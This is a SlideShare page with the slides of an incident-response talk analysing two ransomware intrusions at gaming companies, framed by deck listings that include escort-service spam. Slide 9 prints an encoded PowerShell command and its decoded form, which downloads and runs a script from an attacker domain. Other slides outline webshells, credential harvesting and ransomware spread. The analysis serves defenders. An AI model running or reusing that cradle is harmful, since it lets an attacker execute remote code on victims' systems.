Securing your web infrastructure
Securing your web infrastructureSecuring your web infrastructure
Securing your web infrastructureWP Engine
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Jakub Kałużny
 
Day 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server RedirectionDay 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server Redirectionvngundi
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocolsCONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocolsPROIDEA
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareQuick Heal Technologies Ltd.
 

Similar to Insert coin to continue - Ransomware in the gaming industry.pdf (20)

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptx
 
DEFCON 23 - ionut popescu - net ripper
DEFCON 23 - ionut popescu - net ripperDEFCON 23 - ionut popescu - net ripper
DEFCON 23 - ionut popescu - net ripper
 
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
 
Duck Hunter - The return of autorun
Duck Hunter - The return of autorunDuck Hunter - The return of autorun
Duck Hunter - The return of autorun
 
Nimrod duck hunter copy
Nimrod duck hunter copyNimrod duck hunter copy
Nimrod duck hunter copy
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.
 
Securing your web infrastructure
Securing your web infrastructureSecuring your web infrastructure
Securing your web infrastructure
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
 
Day 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server RedirectionDay 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server Redirection
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attack
 
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocolsCONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry Ransomware
 

More from Stefano Maccaglia

Netwitness RT - Don’t scratch that patch.pptx
Netwitness RT - Don’t scratch that patch.pptxNetwitness RT - Don’t scratch that patch.pptx
Netwitness RT - Don’t scratch that patch.pptxStefano Maccaglia
 
From velvet to silk there is still a lot of sweat
From velvet to silk there is still a lot of sweatFrom velvet to silk there is still a lot of sweat
From velvet to silk there is still a lot of sweatStefano Maccaglia
 
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Stefano Maccaglia
 
Oh... that's ransomware and... look behind you a three-headed Monkey
Oh... that's ransomware and... look behind you a three-headed MonkeyOh... that's ransomware and... look behind you a three-headed Monkey
Oh... that's ransomware and... look behind you a three-headed MonkeyStefano Maccaglia
 
UN Presentation - 10-17-2018 - Maccaglia
UN Presentation - 10-17-2018 - MaccagliaUN Presentation - 10-17-2018 - Maccaglia
UN Presentation - 10-17-2018 - MaccagliaStefano Maccaglia
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Stefano Maccaglia
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentStefano Maccaglia
 
DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...
DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...
DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...Stefano Maccaglia
 
Maccaglia - Cybercrime un approccio tecnologico e sociologico
Maccaglia - Cybercrime un approccio tecnologico e sociologicoMaccaglia - Cybercrime un approccio tecnologico e sociologico
Maccaglia - Cybercrime un approccio tecnologico e sociologicoStefano Maccaglia
 

More from Stefano Maccaglia (9)

Netwitness RT - Don’t scratch that patch.pptx
Netwitness RT - Don’t scratch that patch.pptxNetwitness RT - Don’t scratch that patch.pptx
Netwitness RT - Don’t scratch that patch.pptx
 
From velvet to silk there is still a lot of sweat
From velvet to silk there is still a lot of sweatFrom velvet to silk there is still a lot of sweat
From velvet to silk there is still a lot of sweat
 
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
 
Oh... that's ransomware and... look behind you a three-headed Monkey
Oh... that's ransomware and... look behind you a three-headed MonkeyOh... that's ransomware and... look behind you a three-headed Monkey
Oh... that's ransomware and... look behind you a three-headed Monkey
 
UN Presentation - 10-17-2018 - Maccaglia
UN Presentation - 10-17-2018 - MaccagliaUN Presentation - 10-17-2018 - Maccaglia
UN Presentation - 10-17-2018 - Maccaglia
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...
DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...
DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...
 
Maccaglia - Cybercrime un approccio tecnologico e sociologico
Maccaglia - Cybercrime un approccio tecnologico e sociologicoMaccaglia - Cybercrime un approccio tecnologico e sociologico
Maccaglia - Cybercrime un approccio tecnologico e sociologico
 

Recently uploaded

CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...henrik385807
 
George Lever - eCommerce Day Chile 2024
George Lever - eCommerce Day Chile 2024George Lever - eCommerce Day Chile 2024
George Lever - eCommerce Day Chile 2024eCommerce Institute
 
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptxMohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptxmohammadalnahdi22
 
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...Salam Al-Karadaghi
 
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...NETWAYS
 
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Hasting Chen
 
call girls in delhi malviya nagar @9811711561@
call girls in delhi malviya nagar @9811711561@call girls in delhi malviya nagar @9811711561@
call girls in delhi malviya nagar @9811711561@vikas rana
 
Motivation and Theory Maslow and Murray pdf
Motivation and Theory Maslow and Murray pdfMotivation and Theory Maslow and Murray pdf
Motivation and Theory Maslow and Murray pdfakankshagupta7348026
 
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdfCTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdfhenrik385807
 
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...NETWAYS
 
Microsoft Copilot AI for Everyone - created by AI
Microsoft Copilot AI for Everyone - created by AIMicrosoft Copilot AI for Everyone - created by AI
Microsoft Copilot AI for Everyone - created by AITatiana Gurgel
 
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...Pooja Nehwal
 
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...Sheetaleventcompany
 
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdfOpen Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdfhenrik385807
 
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...NETWAYS
 
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779Delhi Call girls
 
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...NETWAYS
 
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStrSaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStrsaastr
 
ANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docxANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docxNikitaBankoti2
 
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night EnjoyCall Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night EnjoyPooja Nehwal
 

Recently uploaded (20)

CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
 
George Lever - eCommerce Day Chile 2024
George Lever - eCommerce Day Chile 2024George Lever - eCommerce Day Chile 2024
George Lever - eCommerce Day Chile 2024
 
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptxMohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
 
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
 
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
 
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
 
call girls in delhi malviya nagar @9811711561@
call girls in delhi malviya nagar @9811711561@call girls in delhi malviya nagar @9811711561@
call girls in delhi malviya nagar @9811711561@
 
Motivation and Theory Maslow and Murray pdf
Motivation and Theory Maslow and Murray pdfMotivation and Theory Maslow and Murray pdf
Motivation and Theory Maslow and Murray pdf
 
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdfCTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
 
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
 
Microsoft Copilot AI for Everyone - created by AI
Microsoft Copilot AI for Everyone - created by AIMicrosoft Copilot AI for Everyone - created by AI
Microsoft Copilot AI for Everyone - created by AI
 
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
 
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
 
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdfOpen Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
 
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
 
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
 
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
 
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStrSaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
 
ANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docxANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docx
 
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night EnjoyCall Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
 

Insert coin to continue - Ransomware in the gaming industry.pdf

  • 1. ©2022 NetWitness or its affiliates. All rights reserved. "Insert coin to continue... " Ransomware in the gaming industry Stefano Maccaglia Practice Manager, Incident Response
  • 2. Who I Am: Stefano • I am the Practice Manager of the Netwitness (RSA) Incident Response. • I began my ICT career in 1997 in Digital Corp, but I started to crack software in 1985 with a Commodore C64. • I decided to get out of the cracking scene in 2000 to focus on networking… until Nimda and Blaster came out and cybersecurity became an interesting career… • I worked on the offensive side until 2009 when I jumped into the IR bandwagon. • Since then, I lead engagements around the world covering investigation about sophisticated actors.
  • 3. Agenda ❑ Introduction ❑ The first case ❑ Initial Compromise ❑ Second Phase, Second Actor ❑ Third Phase ❑ Ransomware in play ❑ The outcome ❑ The second case ❑ Exotic Lily + Conti… ❑ Enablers of compromise ❑ Lesson learned
  • 4. ©2022 NetWitness or its affiliates. All rights reserved. The First Case
  • 5. Initial Compromise ▪ Through an active exploit of the Exchange Web Server, two webshells were uploaded to DC1- EXCH01 on December 9, 2021. DC1-EXCH00 DC1-EXCH01 MUNICH Data Center 23.183.81.113 Logout.aspx iisstart.aspx The Exchange server version was 2019 CU10
  • 6. Evidence of Initial Attack ▪ The proximity in the file creation (a few milliseconds apart) in different paths, confirm the webshells were dropped through an exploit with chained payloads. ▪ Web logs retention on the server was 30 days, so the logs rolled out before the investigation started, but the webshells were likely uploaded via the exploit CVE-2021-42321, an RCE, based on the folders used to drop them. First Webshell Basic loader Second Webshell with functions to interact with files Timestomped dates
  • 7. CVE-2021-42321 in action ▪ The remote code execution vulnerability is due to issues with the validation of command-let (cmdlet) arguments. ▪ In order to exploit this flaw, an attacker would need to be authenticated. The attack requires execution of 4 POSTs in a chain against Exchange with an authenticated user to be successful.
  • 8. We never leaked credentials… ▪ The attacker authenticated by leveraging on leaked credentials of a subcontractor working as developer in the environment. Yeah that account is mine, but it is a personal account… what it’s the meaning of this?... And how you collect it???
  • 9. Logout.aspx Webshell ▪ This webshell is extremely simple, it call the IIS Worker process (w3wp.exe) to spawn the Command Processor, which, in turn, launches PowerShell (powershell.exe or pwsh.exe). "cmd.exe" /c powershell -ep bypass -e SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3 RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk= IEX (New-Object Net.WebClient).downloadstring('http://www.kuniptikiky.info/p?e') DECODED
  • 10. Webshell Logic of iisstarts.aspx ▪ The second webshell allows the attacker to interact with the system through requests containing the parameter cadataKey. ▪ If the cadataKey parameter is not specified, the web shell performs a redirection to the errorFE.aspx page, returning a HTTP 404 code. • The web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files. • Once implanted, the webshell was allowing the attacker to access the environment with local administration rights. All commands specified through this parameter are executed through an eval statement.
  • 11. ©2022 NetWitness or its affiliates. All rights reserved. Second Phase, Second Actor
  • 12. Second Phase, Second Actor ▪ On February 18, 2022, the attacker uploaded a file named lsass.dll to the DC1-EXCH00 and few minutes later to DC1-EXCH01. ▪ This malicious file is loaded into processes and harvests clear text passwords in real time as various users authenticate with the Exchange server. DC1-EXCH00 DC1-EXCH01 MUNICH Data Center 23.183.81.113 iisstart.aspx lsass.dll iisstart.aspx This long pause between the initial webshells and the subsequent activity could be due to the initial attacker selling access to the Ransomware attacker.
  • 13. Second Phase, Second Actor ▪ The harvested credentials are saved into a file named: ▪ Hundreds of clear text credentials passwords were harvested. ▪ This file was subsequently uploaded to several other servers, including several domain controllers. DC1-EXCH00 DC1-EXCH01 MUNICH Data Center iisstart.aspx lsass.dll iisstart.aspx C:windowstemptmpQWER.tmp User Pass C:windowstemptmpQWER.tmp. User Pass The DLL uses the NPLogonNotify API provided by Microsoft to extract cleartext credentials of users as they log into the servers
  • 14. Second Phase, Second Actor ▪ The attacker also uploaded the first instance of the ATERA agent and Splashtop (a Remote Desktop software) on DC1-EXCH00 on 18 February 2022. DC1-EXCH00 DC1-EXCH01 MUNICH Data Center 23.183.81.113 iisstart.aspx atera.exe iisstart.aspx Atera is an IT management solution that enables monitoring, management, and automation of IT networks from a single console. lsass.dll
  • 15. How to Avoid Generic Detection: Atera ▪ The idea behind this tactic is to leverage a legitimate remote management agents (like Atera) to survive possible Cobalt Strike detections from the EDR and Antivirus platforms. ▪ Relying upon a legitimate tool to achieve persistence is typically a Pen Tester approach and in my personal perspective this can clarify the attacker background.
  • 16. atera.exe How to Complete the Job… ▪ The attacker then resumed activity on 11 March 2022. DC1-EXCH00 DC1-DC0001 MUNICH Data Center 23.183.81.113 Webshell lsass.dll atera.exe lsass.dll The Atera package was uploaded on the Domain Controller of the targeted Data Center (DC1-DC0001) together with the credential dumper “lsass.exe”.
  • 17. How to Complete the Job… ▪ On March 23, the attacker uploaded lsass.dll to the DC1-EXCH01: DC1-EXCH00 DC1-EXCH01 MUNICH Data Center 23.183.81.113 iisstart.aspx lsass.dll iisstart.aspx He immediately started the credential harvesting on this system.
  • 18. Third Phase: 23 March – 5 April ▪ During this period attacker moved laterally to various systems, including Domain Controllers, Backup servers, etc. ▪ Scanning and reconnaissance on the network were executed regularly. DC1-DC0001 DC1-EXCH00 lsass.dll lsass.dll iisstart.aspx atera.exe During these scanning the attacker identified the virtual infrastructure where critical servers were operating. Scanning Workstations Dev Systems Virtual Infrastructure MUNICH Data Center MUNICH Office
  • 19. atera.exe Third Phase: Exfiltration DC1-DC0001 DC1-EXCH00 lsass.dll lsass.dll iisstart.aspx atera.exe DC3-SPORS2 MUNICH Data Center TORONTO Data Center 195.149.87.179 Leaks Leaks MUNICH Office ▪ There is evidence that the attacker stole various files during this time.
  • 20. Status ▪ Ok, we reached this point… it’s April 6, the attacker owns the place and in less than 24 hours he collected about 12,45 Gb of data from the environment including lots of payment and betting details. ▪ Unfortunately, up to this point, the attacker was able to work undetected. Why? ▪ To answer we should clarify the meaning and the role of an “Enabler of Compromise,” but let’s see how the attack unfolded...
  • 21. ©2022 NetWitness or its affiliates. All rights reserved. Ransomware in Play
  • 22. RDP + PSExec Ransomware distribution Ransomware in Play… 6 April 2022 The attacker executed a massive dissemination of the ransomware executable with a combination of RDPs and PsExec sessions. DC1-DC0001 lsass.dll atera.exe Workstations Dev Systems Virtual Infrastructure MUNICH Data Center MUNICH Office TORONTO Data Center MACAU Data Center
  • 23. Ransomware in Play… ▪ With a separated and tailored action, the attacker ensured the backup servers of the company were encrypted, by leveraging another variant of the ransomware. ▪ This variant was also used against the company ESXi servers (about 50 hosts), which adversely affected around 2000 virtual machines hosted in them. ▪ The ransomware file that the attacker deployed to the ESXi servers was named “32app”. ▪ The version affecting all the other hosts was named “bet9je_com_alpha_encrypt_app.exe”.
  • 24. Virtual Server Encryption ▪ The attacker appears to have infected the ESXi servers manually via SSH connections to them. DC1-DC0001 Virtual Infrastructure MUNICH Data Center atera.exe Ransomware Distribution via SSH Sessions Backup Infrastructure Ransomware installed manually
  • 25. What we found: Network Forensics ▪ During the attack, the actor kept three systems untouched, in particular the Exchange server. atera.exe DC1-EXCH00 MUNICH Data Center TORONTO Data Center DC1-EXCH10 DC3-SPORS2 ▪ This is due probably to the goal of keeping an eye upon the target. ▪ In fact, the victim email system was still working despite the encryption of the remaining systems…
  • 26. The Outcome ▪ It took 45 days to get rid of the whole infection, but it took five days to recover basic services allowing the company to slowly get back to business. ▪ From the end-users perspective the attack was a significant blow to the company’s reputation and, at least initially, it impacted on the overall relationship with the company’s customer base. ▪ However, the gaming world has its own rules and 45 days later, it was like business as normal in the company headquarters… apart for some minor, but meaningful details: ▪ Enhanced network visibility ▪ New staff for daily monitoring of network and infrastructures… ▪ No Splashtop, Teamviewer or Anydesk connections ▪ No scripts with hardcoded credentials ▪ New cybersecurity procedures
  • 27. ©2022 NetWitness or its affiliates. All rights reserved. The Second Case
  • 28. The second case: introduction ▪ This case targeted a group operating on the online casino sector with about 2.500 employees. ▪ The company has two data centers located in Australia and Hong Kong and operates mainly in the Asian-Pacific market. ▪ The cybersecurity practice inside the Company at the time was mainly managed by one global MSSP and one local provider. ▪ Again, privacy is a mandatory requirement for an online casino and the company was applying strong controls upon online services and data privacy. ▪ However, they left open several holes in their cybersecurity ecosystem… Total lack of Network visibility both internally and in the Company Private Cloud Lack of organized logs and limited endpoint visibility Lack of any behavior analysis at user level for internal staff Limited investigative and reactive capabilities Real-time Threat detection limited to “low hanging fruits”. Lots of enablers of compromise… Lack of proper escalation plan for ICT incidents
  • 29. Attack Preparation ▪ The attack was organized around a flow very similar to the first case presented, with the difference that the attacker this time targeted the staff with domain spoofing and spear-phishing. Upload payload sharing it with target Send a file sharing notification Register “company.us” to spoof “company.co.au” Create employee@company.us email account Acquire target’s email through OSINT and send a phishing email Send a sounding email discussing business and meetings Online File-sharing Service Victim Attacker
  • 30. Initial Compromise ▪ The attacker sent an email mimicking a contractor and asking for feedback on a service architecture. ▪ The email was asking to set a time for a call the following week about the content of the email. MUNICH Data Center 44.227.65.245 Attacker
